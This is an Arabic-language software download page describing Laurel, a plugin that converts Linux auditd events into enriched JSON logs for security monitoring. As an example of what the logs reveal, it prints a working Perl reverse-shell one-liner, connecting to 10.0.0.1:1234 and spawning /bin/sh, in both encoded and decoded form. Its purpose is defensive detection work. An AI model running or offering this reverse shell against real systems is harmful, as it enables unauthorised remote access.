الصفحة الرئيسية>المتعلقة بالبرمجة>شفرة المصدر الأخرى
تنزيل

Linux Audit - قابلة للاستخدام ، قوية وسهلة التسجيل

Laurel هو مكون إضافي للمعالجة بعد المعالجة من أجل Auditd (8) والذي يولد سجلات تدقيق مفيدة ومثابة على أساس JSON مناسبة لإعدادات مراقبة الأمان الحديثة.

يمكن العثور على الوثائق المقابلة لأحدث إصدار مستقر هنا.

لماذا؟

TLDR: بدلاً من أحداث التدقيق التي تبدو هكذا ... 

 type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

... يحولهم لوريل إلى سجلات JSON حيث تصبح الفوضى التي يحاول المهاجمين/الاختبارات/الفرق الحمراء جعلها واضحة للوهلة الأولى: 

 { … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};"]}, …}

يحدث هذا في المصدر لأن Laurel يعمل على المضيف حيث يتم إنشاء أحداث التدقيق. يتم إثراء الأحداث بمعلومات مفيدة حول العملية الأصل (PPID): 

 "PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}

الوثائق

يتم وصف التفاصيل والتفاصيل التشغيلية في الصفحة اليدوية لوريل (8). يمكن العثور على تفاصيل حول تنسيق السجل والأسعار المنطقية في الصفحة اليدوية Laurel-about (7). تحتوي صفحة Laurel-Audit-Rules (7) على نصيحة وأمثلة لتكوين قواعد التدقيق المفيدة لاكتشاف تكتيكات المهاجمين.

تحتوي إرشادات تثبيت Laurel على تعليمات حول كيفية إنشاء Laruel من Source وكيفية تثبيته وتكوينه.

لقد قمنا بتطوير Laurel لأننا لم نكن راضين عن مجموعات الميزات وخصائص الأداء للمشاريع والمنتجات الحالية. يرجى الرجوع إلى وثيقة الأداء للحصول على التفاصيل.

انظر أيضا

  • Ansible-Auditd-Laurel ، دور ansible لنشر Auditd + Laurel ، بواسطة @0xfustang / cert-eu

رخصة

رخصة عامة عامة ، الإصدار 3

المؤلفون

تم إنشاء الشعار بواسطة Birgit Meyer <[email protected]>.

يوسع
معلومات إضافية
تطبيقات ذات صلة
نوصي لك
أخبار ذات صلة الكل